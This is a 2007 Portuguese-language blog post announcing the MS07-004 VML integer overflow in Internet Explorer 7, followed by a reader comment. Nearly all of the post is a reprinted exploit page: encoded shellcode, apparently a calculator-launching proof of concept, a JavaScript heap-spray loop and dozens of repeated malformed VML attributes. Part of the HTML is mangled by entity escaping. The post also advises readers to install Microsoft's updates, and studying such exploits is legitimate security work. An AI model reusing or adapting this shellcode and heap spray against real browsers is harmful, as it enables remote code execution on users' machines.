« waybackmachine
Memtest86+ »

MSIE, VML Remote Buffer Overflow Exploit (MS07-004)

Foi encontrada uma falha no MSIE7, o MS07-004 VML integer overflow exploit por 'lifeasageek at gmail.com'. Aconselha-se atenção às actualizações provenientes a partir da Microsoft, ou a utilizar outro browser.
Todos os javascripts utilizados são baseados no MS06-055 exploit escrito por by Trirat Puttaraksa (Kira) 'trir00t at gmail.com', e ligeiramente modificados.

Exemplo de código:

PLAIN TEXT
HTML:
  1. <object id="VMLRender">
  2. classid="CLSID:10072CEC-8CC1-11D1-986E-00A0C955B42E"&gt;
  3. </object>
  4.  
  5. <style> v\:* { behavior: url(#VMLRender); } </style><script language="javascript"> shellcode = unescape("%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063");
  6.  
  7. bigblock = unescape("%u0505%u0505"); headersize = 20; slackspace = headersize+shellcode.length; while (bigblock.length<slackspace ) bigblock+=bigblock; fillblock = bigblock.substring(0, slackspace); block = bigblock.substring(0, bigblock.length-slackspace); while(block.length+slackspace&lt;0x40000) block = block+block+fillblock; memory = new Array(); for (i=0;i&lt;350;i++) memory[i] = block + shellcode;
  8.  
  9. </script>
  10. lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
  11. fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/&gt;
  12.  
  13. lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
  14. fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/&gt;
  15.  
  16. lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
  17. fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/&gt;
  18.  
  19. lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
  20. fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/&gt;
  21.  
  22. lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
  23. fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/&gt;
  24.  
  25. lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
  26. fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/&gt;
  27.  
  28. lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
  29. fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/&gt;
  30.  
  31. lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
  32. fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/&gt;
  33.  
  34. lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
  35. fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/&gt;
  36.  
  37. lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
  38. fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/&gt;
  39.  
  40. lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
  41. fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/&gt;
  42.  
  43. lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
  44. fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/&gt;
  45.  
  46. lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
  47. fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/&gt;
  48.  
  49. lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
  50. fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/&gt;
  51.  
  52. lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
  53. fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/&gt;
  54.  
  55. lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
  56. fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/&gt;
  57.  
  58. lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
  59. fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/&gt;
  60.  
  61. lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
  62. fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/&gt;
  63.  
  64. lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
  65. fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/&gt;
  66.  
  67. lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
  68. fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/&gt;
  69.  
  70. lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
  71. fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/&gt;
  72.  
  73. lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
  74. fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/&gt;
  75.  
  76. lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
  77. fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/&gt;
  78.  
  79. lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
  80. fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/&gt;
  81.  
  82. lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
  83. fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/&gt;
  84.  
  85. lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
  86. fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/&gt;
  87.  
  88. lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
  89. fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/&gt;
  90.  
  91. lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
  92. fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/&gt;
  93.  
  94. lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
  95. fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/&gt;
  96.  
  97. lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
  98. fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/&gt;
  99.  
  100. lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
  101. fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/&gt;
  102.  
  103. lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
  104. fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/&gt;
  105.  
  106. lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
  107. fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/&gt;
  108.  
  109. lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
  110. fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/&gt;
  111.  
  112. lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
  113. fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/&gt;
  114.  
  115. lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
  116. fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/&gt;
  117.  
  118. lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
  119. fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/&gt;
  120.  
  121. lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
  122. fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/&gt;
  123.  
  124. lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
  125. fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/&gt;
  126.  
  127. lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
  128. fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/&gt;
  129.  
  130. lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
  131. fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/&gt;
  132.  
  133. lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
  134. fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/&gt;
  135.  
  136. lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
  137. fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/&gt;
  138.  
  139. lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
  140. fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/&gt;
  141.  
  142. lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
  143. fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/&gt;

This entry was posted by ponto on Wednesday, January 17th, 2007 at 9:42 pm and is filed under Microsoft, Segurança. You can follow any responses to this entry through the RSS 2.0 feed. You can skip to the end and leave a response. Pinging is currently not allowed.

One Response to “MSIE, VML Remote Buffer Overflow Exploit (MS07-004)”

  1. 17/01/07 at 22:06

    raca using Opera Opera 9.10 on Windows Windows XP says:

    Just use lynx! Or better don't use the 'tubes'.

Leave a Reply